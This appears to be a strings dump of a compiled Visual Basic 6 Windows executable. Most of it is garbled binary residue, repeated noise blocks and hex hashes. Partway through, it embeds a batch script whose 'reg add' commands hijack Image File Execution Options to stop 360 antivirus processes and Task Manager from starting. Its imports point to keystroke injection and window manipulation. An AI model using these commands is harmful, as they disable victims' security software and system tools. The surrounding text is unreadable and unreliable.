!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
))77DDQQ__kkppqqooee
((88EEPP[[ffppxx
++::HHVVeeqq}}yy_AA
JJJ t))^ !!&&..55CCOO]]mmzz
DDD"$$ %%--//2244::DDPPZZhhtt
NNN$%%""%%**++**((%%''1199EEQQ__kkxx
ZZZ"$$!!%%$$""
--55BBNN[[gguu
--9977==IIVVbbllxx
CbbZnn@@==FFRR^^hhss||
&KqddBBCCOOZZddnnyyzz
OO7WW?z
BcNNCCLLUU``jjss||zzYY<$$
5Ur^^DDFFPPZZddmmssffd66
(FcMMCCJJSS\\eeeeII/
6UrjjCCCCKKTTZZRRg..
(EcGG<<AAIILL::4
6Uv\\;;77>>99h!!
&FeAA//00''8
3RmNN,,##]
=Up;;d JJ
__ ::^<<yymm
d++GG__ss{{
b""::OO__ffppxx||
((>>MMWW]]``ddmm}}xx
-H}}0077CCKKOORRUUXX^^ppnn
!7SZZ>>==@@CCFFHHJJPPbbxxbb
7Rs[[::4477::;;>>BBUUkkxxWW
*GdOO****++..0066GGbbuunnLL###X
AA@@''
""((<<UUff``BB)))E
==OGG//
11HH[[VV<<5550@@@
''>>NNIIK<<jMMM
BBEE**
1K^n||
""55AA??FFFIiii
==KKK66
'9FW44
))7788AA]]],
FFCC--
++8899XXXQ
>>RKK==%%
//66BBttt.
EEJJ66
%%33<<kkkE
,,88RRk$
??YOOGG33
&&11DD.
DDtPPHH22
%%//<<3
GG~SSJJ55""c
##..::1
FFuRRMM<<((h
$$,,77+
PPBB22p%%H
!!**,,
>>)JJRRMMBB44{))!!
$$,,--//DDF
DDSJJPPLLCC<<33**%%
!!##%%**..11,,00c
<<LFFLL
QQLLFFBB>><<::8877::<<====66
00..Wiii
@@PCCFFHH
JJMMMMKKIIDD
==9911Xz77
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
<<<3l44e::FFWWggvv
UUU'88n..99KK\\rr
_ZZ322000022==IIYYjj||
HHG..%%$$
22<<NNaatt6))
II?&&
w00y??DDWWhhzz
~xx &&
"<`YYDDSSeevv}}~QQ1h
5Y}MMOOaarruuTT)''
*OnccMM\\iibbN))
>`}NNUU[[BB
%Lh[[HHHHN
.Pe;;00
1FgPPA--
N##DDdd
55MM\\eeuu
#9}66BBMMSSWWaa}}ww
<\JJ@@@@DDNNkkii
.Qq[[BB55;;[[ssYY
4Vl{AA//JJbbII
55iKK,,
,EP`,,??OO<<
)) II>>
";%%66<<n66f!!!
<<MM//N
5544<<<3
GGm''+
++66::nCCC
66zRREEe##)
1199UUU'
>>UUEEf%%*
0066c__3
BBXXIIl,,1
++22HHG
??WWOOx;;J&&5
%%0011LL@
VVLL==11##
!!**220000~xx
''488HHSSQQKKEEBB>>==@@AA>>55--55H
!! //g::CC
GGJJJJFF>>
11++p33-
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
|CC.33KKmm
88[))))FFWWzz
866dOO^^
9oDD::
CWii ##
>__LL]]zz
ULL99VVnn
2lxx99NN
>>s 2
;1166333
m 22DD1
778FFA
EET$$++;;Z
669GGY::6??
BBAA==11
DDDDDD
DDDDDD
DDDDDD
[xe<P(
[xe<P]
&N(W}/eJX-N8eQ`@bv
000000
000000
NfM0$P(
S0n0$Pn0
0L0Lc0f0O0`0U0D0
n0e[0000
O(uY00k0o0
0eW0D0$P0
O(uY00k0o0
NfM0$P]
0xbW0f0]0n0$P0eQRW0f0O0`0U0D0
BE772A5815A5087495005CFAEF05E050
9B38B5EBD92445D673B002A8CBE953D0
4252AC441217A0AB1EBBE9F2C1D5036F
4252AC441217A0AB1EBBE9F2C1D5036F
B538968EC4C5940D395F6FEC4078B080
EE8CDB9E62F6AB53C7C3241B2E3F49ED
CBC3103851B254409688A6F785D9F21A
C5D7ACC95340E068E4007664183DAD7C
D844D4B560FB9CBEE2800DF7C509A63D
FB38C2BA2A06016788A582611FCCC761
D8BF62A792C73BCC152A16EA7A34009F
ECDDAA2994A26F48C74AA459CB903A23
95E2FF5F9B55DC933BA0939EA3D41E0B
1DB684FD96EAC6F83F7C610B0E59BC3C
4F989CDC9DB79932D15CD266D7107495
885BDEB0871A6F42C34B43FE6C4AB3D7
A7AC0723B46256E1910A5249F965B9BA
0A5E5F7BB40DC4473498137A9946EF85
15E63336E13D37EE1ECDFBAE19E8B625
4FE7E777741336685F848A95051C2EC9
E18363315A661FA8603D458E5D5FD1D9
492CB2EBF8AAC15FF665E65D80379296
D1832484991ED384453E78995E4175D1
21F77A36A1618EAB9A390DA2E01D0863
B9EF236F12D844B98FDF59F0B7C4120C
470EC970E94973EB96C25D1932A62A1A
5D5F8C08527E4C31A0ECBE48C638243A
5D5F8C08527E4C31A0ECBE48C638243A
F06DC8A0103C5178C4B9C950B8B27477
E445C5A252AF3CFDD4E5BBD5E54D6F9B
587EE20D8E3F1ED9F5527628180CC99F
30BCFC9A58F487D2839053A75C026640
DD30DB4651F1F67ACB6B34B61519343C
954251F477538BBEFFEB8C5954FF86D3
9C4A2B88FB7C7476226A571707846B88
71636ACFCBD1C2CDF519B7D5B54A5E8F
3B2CBF68961767627E63727D32A0DBF8
87A1F20FC353CEBC27675A8C13F2525A
534435865D2F21A754D77ACC09197D12
FA0AB87CC620BEC3ABD5D38BE87B2B63
4B8C757F4E7B9D9740E4D795D5128BAC
10514C6757143FC21F9EAACF553A48A4
142D51BEC919C34415BD319273BE4BCE
D20B63D406CACA1D93A3A795D3CDE2A9
479E793FEF3DBA30E8C3F90F0E2ED32F
456EAA00786A22128823292E5EF01B87
4216E42459AD04E98578B5953EABD91C
4216E42459AD04E98578B5953EABD91C
67C1F0D510BC852937CE110BC39B4EF7
718BAAB942C2EB1899AEB1C25913BB45
CCC5C9D272A2B1642ADDAD15AE9D8E96
6ABAA2736F2B0D2D770C705264A6F2A8
BB0AA9C5AC1F4DB67466CE45953E1F2C
02189D6C426766972A81547B97D4F95A
88AEC70842425722D0D11B80F67F2998
L!This program cannot be run in DOS mode.
#BBBL^B`BdBRichB
`.data
MSVBVM60.DLL
rjrbrrr
rvjrNr:
rrbr*<r}Artr
rr4ur9
r}irWr!NrwrSr+rgr
=r:r7ruBr
Vr2Cr:
rJlr r
rrar5r
r$br/Nrwr
rrpurkrmrIrr0lrF
yE81$HH
M%-:O3f
2.X By:znkzz
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
Timer2
Timer1
Label3
@echo off
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\ZhuDongFangYu.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\360tray.exe" /v debugger /t reg_sz /d "ntsd -d" /f
reg add "hklm\software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe" /v debugger /t reg_sz /d "ntsd -d" /f
Label2
Label1
Label1
yE81$H
VB5!6&vb6chs.dll
zE!~@Jke
Class1
yE81$H^pqD
Label1
+3qC:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Timer1
Timer2
Label2
Label3
user32
keybd_event
GetForegroundWindow
user32.dll
GetWindowTextA
GetWindowTextLengthA
FindWindowA
SetWindowTextA
SearchFiles
getCaption
+3q"=h
+3qhJu
+3qClass
C:\windows\SysWow64\MSVBVM60.DLL\3
RegisterA
RegisterB
RegisterC
RegisterD
Md5_String_Calc
Md5_File_Calc
GetValues
MD5Init
MD5Final
MD5Update
LongLeftRotate
__vbaVarSetObjAddref
VBA6.DLL
__vbaStrVarVal
__vbaVarCopy
__vbaStrToUnicode
__vbaStrToAnsi
__vbaSetSystemError
__vbaLsetFixstrFree
__vbaVarForNext
__vbaFpI4
__vbaFPInt
__vbaStrR4
__vbaVarLateMemCallLd
__vbaNew
__vbaVarSetObj
__vbaPutOwner4
__vbaStrVarCopy
__vbaPrintFile
__vbaI2Var
__vbaVarForInit
__vbaFileClose
__vbaGetOwner4
__vbaRedim
__vbaFileOpen
__vbaEnd
__vbaFreeObjList
__vbaNew2
__vbaVarDup
__vbaOnError
__vbaFixstrConstruct
__vbaErrorOverflow
__vbaAryDestruct
__vbaFreeVarList
__vbaAryUnlock
__vbaAryLock
__vbaFreeStrList
__vbaVarTstNe
__vbaFreeObj
__vbaHresultCheckObj
__vbaObjSet
__vbaVarMove
__vbaError
__vbaFreeStr
__vbaDerefAry1
__vbaStrCopy
__vbaI4Var
__vbaRedimPreserve
__vbaVarAdd
__vbaLenBstr
__vbaFreeVar
__vbaStrCat
__vbaStrMove
__vbaI2I4
__vbaUI1I2
__vbaAryConstruct2
__vbaFpUI1
__vbaVarCat
__vbaStrVarMove
__vbaUI1I4
__vbaVar2Vec
__vbaGosubFree
__vbaExitProc
__vbaGetOwner3
__vbaGosub
__vbaErase
__vbaLenVarB
__vbaAryMove
__vbaGenerateBoundsError
__vbaStrI4
FileType
SourceString
InFile
InputLen
InputBuffer
}}}}}}}|l\EWEPE
EPlPEPt
MJSEP.PSj
M3EPPu
lXEP@Puy0@X
XP7M)j
tSlPEP
XMfXf9X
#fXEPEPj
EPlPEPt
MSEPPSj
MEPPux
uEPEPj
SEP*L]L9E
MEPHEPEPj
MX|PEPj
} jdh<3@
hPEPEPE
} jPh3@
} jXh3@
MEPEPEPEPj
hPfEhOE
uujj E
MhPEPEPE
HP8P(PPPEP|
P|PEPEP9P
P|PDEPEPP
jj MmE
;PEP7E
PxP8PHP(PP
PPPPPPPP{PxPhPgj
EPXPJ
M9hPxPPPPPPPPP
PHP8PXPhPj
PxPx|x
} jPh3@
} jXh3@
1EPEPEPEPj
EPEPEPEPj
XPhPxPPPPPPPPP
P(P8PHPXPhPj
LSVWeE
VuEPgP3
EPHM`EUM
McM+MS
PEPDEEPE
jTh,3@
jPh,3@
EP@Pu>MDE
SVWeEP
SVWeE`
M_h6]@
SVWeEp
MKhJ^@
TSVWeE
]]]]P8;}
VPHEPEP
P$MQMQE
j@WVPM
MQVP4;}
UM]h_@
EP3S#EPS
j\XXSVWeE
PPuVj@YE
M/M'MO
HSVWeE
VEPEP}}}
EWEPEP+P
WVEPEP]E
MJEPEP
3EPEPj
4SVWeE
QV}}}}
QVPLuuB
EPEPEPEPEPEPj
EPEPEPEPEPEPj
E_EEPE
P]}u-EPEPEP"P"
MEPEPj
>EEEPE
Es^uS'EEEEPEP}u;EPEPEP0P0
MEPEPEPj
EEEEPEP}uEPEPEP
EEEEPEP}u1EPEPEP&P&
MEPEPEPj
EEEEPEP}u
EPEPEP
EEPEP}u
EPEPEP
EPEPEPj
EEPEP}unEPEPEPcPc
M)EPEPj
EPEPEPj
SVWeE0
MQMQ}}]V}~PPp
MQMQVPp
MQMQVPp
MQMQVPpFDMH
XSVWeE8
EP]]]]
EEj@_]E
jxX+MQM
MQMQVPpM
MQMQVPpE]E=
MQMQVPpE]E=
MQMQVPpE]E=
MQMEQE
VPOhl@
LSVWeEH
NPj@_e
f;EE~]
E\f;EE
VPPfEf
HSVWeEP
EEEEEEEEh9@
MQEMEQE
MQMQMQu
MQMQMQMQVExjE
MQMQMQM
QMQMQMQMQEVE
MQMQMQM
QMQMQMQMQVEp $]PXj
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME*
QMQMQMQMQVPX
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVPX
MQMQMQM
(QMQMQMQMQVE[]PX
MQMQMQM
,QMQMQMQMQVE\}PX
MQMQMQM
0QMQMQME"
QMQVPX
MQMQMQM
4QMQMQMQMQVEqE
MQMQMQM
8QMQMQMQMQVECy]PX
MQMQMQM
<QMQMQMQMQVE!
MQMQMQMEb%
QMQMQMQMQVP\
MQMQMQM
QMQMQMQMQVE@@E
MQMQMQM
,QMQMQMQMQVEQZ^&]P\j
MQMQMQu
MQMQMQMQVE
MQMQMQM
QMQMQMQMQVP\
MQMQMQM
(QMQMQMQMQVES
MQMQMQM
<QMQMQMQMQVE
MQMQMQM
QMQMQE}MQMQVP\
MQMQMQM
$QMQMQMQMQVE!E
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVE
MQMQMQME
ZE} QMQMQMQMQVP\
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVEE
MQMQMQM
QMQMQMQMQVE
EL*}MQMQMQM
0QMQMQMQMQVP\j
MQMQMQM
QMQMQMQMQVEB9]P`
MQMQMQM
QMQMQMQMQVEqE
_MQMQMQM
,QME"am}QMQMQMQVP`
MQMQMQM
8QMQMQMQMQVE
MQMQMQM
QMQMQMQMQVED
MQMQMQM
QMQMQMQMQVEKE
MQME`K}QMQM
QMQMQMQMQVP`
MQMQMQM
(QMQMQMQMQVEpE
MQMQMQM
4QMQMQMQMQVE~(]P`
MQMQMQu
MQMQMQMQVE'E
MQMQMQM
QMQMQMQMQVP`
MQMQMQM
QMQMQMQMQVE
MQMQMQM
$QMQMQMQMQVE9
MQMQMQM
0QMQMQEE
MQMQVP`
MQMQMQM
<QMQMQMQMQVE| }P`
MQMQMQM
QMQMQMQMQVEeVE
MQMQMQu
MQMQMQMQVED")E
MQMQMQM
QMQMQMQMQVPd
MQMQMQM
8QMQMQMQMQVE#E
MQMQMQM
QMQMQMQMQVE9E
MQMQMQM
0QMQMQMQMQVEY[eE
QMQMQM
QMQMQMQMQVPd
MQMQMQM
(QMQMQMQMQVE}E
MQMQMQM
QMQMQMQMQVE]E
MQMQMQM
QMQMQMQMEO~oE
MQMQMQM
<QMQMQMQMQVE,E
MQMQMQM
QMQMQMQMQVE
MQMQMQM
4QMQMQMQMQVE
MQMQMQM
MQMQMQMQVPd
MQMQMQM
,QMQMQMQMQVE5:E
MQMQMQM
QMQMQMQMQVE*E
MQMQMQM
$QMQMQMQMQVE
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
MQMQND
QVPhFDMH
S3Wf8f
f;]]]]
QWVPlEM
QWVPlEM
QWVPlEM
QWVPlEM
SVWeE`
V3EEEE
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaStrI4
__vbaVarMove
__vbaAryMove
__vbaFreeVar
__vbaStrVarMove
__vbaLenBstr
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaError
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaAryDestruct
__vbaExitProc
__vbaVarForInit
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
_adj_fdivr_m16i
_CIsin
__vbaErase
__vbaChkstk
__vbaGosubFree
__vbaFileClose
EVENT_SINK_AddRef
__vbaGenerateBoundsError
__vbaAryConstruct2
__vbaPutOwner4
__vbaI2I4
DllFunctionCall
__vbaFpUI1
__vbaRedimPreserve
__vbaStrR4
_adj_fpatan
__vbaFixstrConstruct
__vbaRedim
EVENT_SINK_Release
__vbaNew
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaUI1I4
__vbaExceptHandler
__vbaPrintFile
__vbaStrToUnicode
_adj_fprem
_adj_fdivr_m64
__vbaGosub
__vbaFPException
__vbaGetOwner3
__vbaStrVarVal
__vbaVarCat
__vbaGetOwner4
__vbaI2Var
__vbaLsetFixstrFree
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaVar2Vec
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaVarSetObj
__vbaFreeStrList
__vbaDerefAry1
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarTstNe
__vbaI4Var
__vbaVarAdd
__vbaAryLock
__vbaVarDup
__vbaStrToAnsi
__vbaVarLateMemCallLd
__vbaFpI4
__vbaVarCopy
__vbaVarSetObjAddref
_CIatan
__vbaStrMove
__vbaStrVarCopy
_allmul
__vbaLenVarB
_CItan
__vbaAryUnlock
__vbaFPInt
__vbaVarForNext
_CIexp
__vbaFreeStr
__vbaFreeObj
S!!#uR
zzzzzzzz
zzzzzzz
zzzzzzzz
zUzzyQz
zzzzzzzzz-
zzzzzzzz-
zzzzzzzzz
zzzzzzzzzzz
zzzzzzzzf
zzzzzzzG
zzzzzzzzz
zzzzzzzzzzzz
C:\Users\Administrator\Desktop\
2.X.pdb
3964344A5F101BBA10AF84388155DFBD
1FD3607D4327B50EB6EDDABE78C6FA87
D1B2D8671EFC317E434137437EEF4A96
370027142FF336DDB2EE9E351C47EDA5
D47BD13313C220FC81E2540FDD038E6A
4C247094201EB65DE12AA17F20575ED9
7EAE529F10C8EA87C8CADCC469D1CE76
CE9ADAC29177BF143E24B1BCE2A0859C
5BB894201EF96C9C75AE3F22DD9BEB74
B3238B574B3390358ED3AC8F60226CCD
9FEBFDDC3BFD3D2FCB45F7F1D8FF39E7
199350BB6558935F20C7C2ACB1D2A315
065AC7FCDA71AF7905F67307B1E0131F
184806EBCFA7D9D66674D0362DFDA9FC
B30CD0A83AF9B887FDCB16B4059078D4
0D4261D61956CCBFEC24C5D476B6C801
25A99EB4214CFE27E51E3F9CD7097407
E24026E736358CD755DF447A99406D3A
HH;s+]
SV393u
WuuSMuuuSM,u
uuSMPuuSMptSl|uSx
MMJMMM*M_M^[d
SW39 tb9_
t]V]]WM]
SW39 tb9_
t]V]]WM]vj
SW39 tb9_
t]V]]WM];j
SV393th9s
tcuuSMuY9s$t@j
t>EEVMEqE
(VW39>t^9~
tY}}VM
}}}VME
1`7_^U
187_^-
PQ _|%f}
NYYu^]
Sn_^[]
VVMF$t1D
9u_N$t
VVM=F,
<uN,_t
VVM2F0t-
SCYYPu
P+PS$u
S3V^8^<^@W=T
^$^(^,^D^H^L^P^T^X^\^`^d^h
Xlh@Pj\X=~
Xl[h@Pj\X~
;}/Php
SW39;}
}}SM}9{
X]LTD8<P4E
TT;|gPh
T1;|DT;t
SVWXE3Vh
XuPTH@DS<E
SVWE+3Vh
G$Ph\2
G(Ph@2
G,Ph(2
p[$;th38j
Y}83t4u9HE
SVWXE3Sh
TY|?Tt
9U>_^J
9-N 9#N
VW39>tR9~
tMS}}VM}E
VW39>tR9~
tMS}}VM}mE
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}E
SVWXE3Vh
VW39>tR9~
tMS}}VM}E
XEH3Sh
X]PTH48@0E
;|\9Tt\T@D
;|DT;t
DWXH3Sh
3;@tcH@`
;|DT;t
VWWMjw
MtFW>p
SVWXEH3Sh
WT;|DT;t
SVWXEO3Vh
XuPTH<@S8E
VT|FTt
SVWXE 3Wh
F Ph4E
T |?Tt
TWXE-3Ph
XEPHTVhtF
3Dt^Dp
PTW;|FPt
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}
VW39>tR9~
tMS}}VM}}E
SVWXEG3Sh
X]TPLD
;|A9DH
b|M_^d
L@[L;t
;|N9LtRL@L;t
VW39>tR9~
tMS}}VM}
UQQSV5
VVPVPVVVVVV
PSPVPP
;u?SVP
M_^[T(
S4PW0,
;YtajfY3
,S4P,0
SVW3S8QLQS<QEE
,PHPSh?
SLPSP0
;u`@S8PLPS<PP@D8<
QQWVWWWPh
jd4PjdWh,
PPWVWWW
Yu3YYu
iM_^[b
It{It9I
u`Y3@M_^[s
UQVWju
f}@5po
Wj'Y3d
Wj'Y3df!ldPj
VEP3EPVh?
uYEPEPEPVu
uGEPEPEPVu
UQSVWPo
3Ct&90t
EPShhL
EPShDL
EPShhK
EPSh<K
Ht}HtfHtOHt2Ht
S3VW]]o
]*]]]VME
uM6VMZ^5
M]A^MM\M_^[d
UQV3VEPVh
SV3f90u
utGf=#
f;u9uu#S
f;u3f;.uu>
Y?nt6Ht
VXPjdj
ZXXZ3@^
SVXEqm3j
D8PHSa
D38Q@PWTL
DX8QPWTL
DX8QPWTL
X8QPWT
D8PSWT
D38Q@PWTL
DX8QPWTL
DX8QPWTL
DX8QPWTL
X8QPWT
P4WTSPh
4PPWTPh
SuPHPh
VWXTcjd_
SXP3hl
H<PVLa
H3<Q@PWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
HX<QPWTP
X<QPWT
VWXT\ajd_
H<PVLa
H3<Q@PWTP
HX<QPWT
HX<QPWTP
HX<QPWT
HX<QPWT
HX<QPWT3C@P
X<QPWT@
<8O<D0QPhM
@PqG|2F
VS^_3[]
VWEZ3X}uZ`jZ_ZTZ(IZ
((7F&F
FXXEEM_d
SVWXEX3}XWWh
S!t!xho
SW3EX\ho
T}J<;u
=((=XX=
=``n=]=MT
VXE.P3j
*9;u)E
y4XX7_[Md
VXEJ3j
#4;u)HE
3;v:9,
XPt 9(
3+tSHt=Ht'Ht
?3_[Md
PQXP E
H@@<RQP
XTI@5|o
@4PDSa
@34Q@PWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
@X4QPWTH
X4QPWT
PLWTSPh
LPPWTPh
SuPHPh
tKWPhI
X6PXP$09H
vLWPhQ
XP4XP,9x
vLWPhJ
XPXP|,9
vLWPhK
XPXP(,9
vLWPhL
XP8XP,`
#tiWPhM
XPXPc
#XX#M^d
XT63SjdX]W"j
tVWXPhN
t!tVWXPhO
PTXPV|
!tOWXPhP
QTPP09Lt0WXPh[
PTXPV @]b X
t!M_^d
WXT(A4F
(v1Wjd(E
4/X}&/E
VPjdWkX
VXPjrW[X
j0d5po
VXPjdWW
VPjdWE
VXPjrW%W
j0d5po
3@M_^d
VXPjdWE
$`Y`VPhs
VXPjdWE
,j0d4W
X/)($)
V(PjdWE
j04dW
SVW33G;EE
xPPtPS|t
(&]&&X&
V(PjdSE
(R#X}D#9#
3@M_^d
W3WS S
EPuWSj
3uLPho
PjgYYj
;tc90t_Vj
VPjdS@
}*VXPjrj
j0d5po
VPjdSY?
PP}*VXPjrj
j0d5po
VPjdS&>
P}*VXPjrj
j0d5po
VPjdS<
P;})VXPjrSX<
j0d5po
+tGHt5Ht#Ht
df8hCVXPhO
+VXPhN
V(PjdWE
VPjrWN9
j045po
YY2XX!
(PXch`Q
(PXh`Q
((wXXfM_^d
df0\Ph
uijdhQ
9hv=LPPPTPXPhQ
Vjn[hQ
f04V5po
XX((|``kZI8Md
u<EPSj
UDSVWh
EEP5po
W3WuEP
E+EWPE+EPE+E
EPW5to
+V4YJ\`
+Vs;5``
3_^[;5l`
SWE30}j
f8@@f98uVW
Wd45po
X``UV`Ph
V(PjnW%
Wld5po
9,(t hR
Xb(WV(Ph
V`PjnW#
W4d5po
((JXX9(
P3Vh<L
M3Fx5Ho
VVWUYu\3A9
VVdV5po
vTl3|j
WXPjdVE
Vd5po
jqYYxMh
WPjd3VE
WXPjiV
j0d5po
W(PjdVE
ddP+@j
XXn]L((;3VVh/
;t?95o
SWPj5|o
SXPjlVE
S(PjdV3
PWdPo095
((XXMl
W3WWEE
uK\Ph`
`PWh4S
v*GGf? w f="
dGtpWq
dstpW,
W'@Pj.} =o
&39u 9=o
4PjsWc
NYYShN
t7ShTN
YYShTN
t7Sh(N
YYSh(N
V4Pjd3W
FYYShN
t7ShTN
YYShTN
t7Sh(N
~YYSh(N
twf}66
t7ShTN
YYShTN
t7Sh(N
PYYSh(N
uG`P3PPh
Wdt@Pj d~
lPjfVz
fd[PM_^[w
fDV*^]
_3_^[]
URuPQT|+}
URuPQT|+}
U SVW3S
UREuTq
|P9]tKEP]
PQHE;t
dE{VdXpG
YYu#9`u
YM_^[m
PqXPWV6
W3}X(hZ
`((OXX>-
S df8o
VXWWPX>Yo
;t=PhxU
VX`WWPXXo
;t=PhHU
WWPXXo
VXWWPXlXo
;t=PhT
VXWWPX&Xo
;t=PhT
VXHWWPXWo
;t=PhT
WWPXW9ht_hxT
WWXP(GW4hDT
CdDdPWphZ
804W,E
;LtHXP
P0XPht\
8;t1XQ
PXPh`\
D;t1XQ
PXPhL\
H;t1XQ
PuXPh4\
P;Lu<;
P;Lu8;t+hD[
TD;t+h
TH;t+hZ
XET,23
40TPh^
,YYP;H
SVWXET
P0DPh^
SyYY^W3Gt
t+Ht!Ht
+t+Ht!Ht
YY hPd
PiK -f
Y|jv(T,u
WpVWis
WJ3098
RPTDHQv<Ph0s
YY hPd
VXJOuXP
7v!;hs
XX{M_^d
3SEEEA
E0EPhx
SV3;WE
WVW37(
W/YY hPd
WLVWEs
WYY3M_^d
SVW3;E
@PaPh0
YYt"7h
WSm0Xe
@Pj\y~
y3M_^d
PX4XPhx
PXyXPhx
PX$XPhx
PXiXPhx
P(lh,T
\ 3*qM_^d
E0EPh0
E0EPh0
YY^ltD`
W~VWws
WSYY3_^
PX:zXPh
PXyXPh\
dXXd$b
YY hPd
3((*`M_^d
XHTPrHPhH
PV;YYt
PVh;YYt
PV<;YYt
PX`lHXPh
V@YY h
XPVWV^h
XPViWV
X3M_^d
WXTDk3
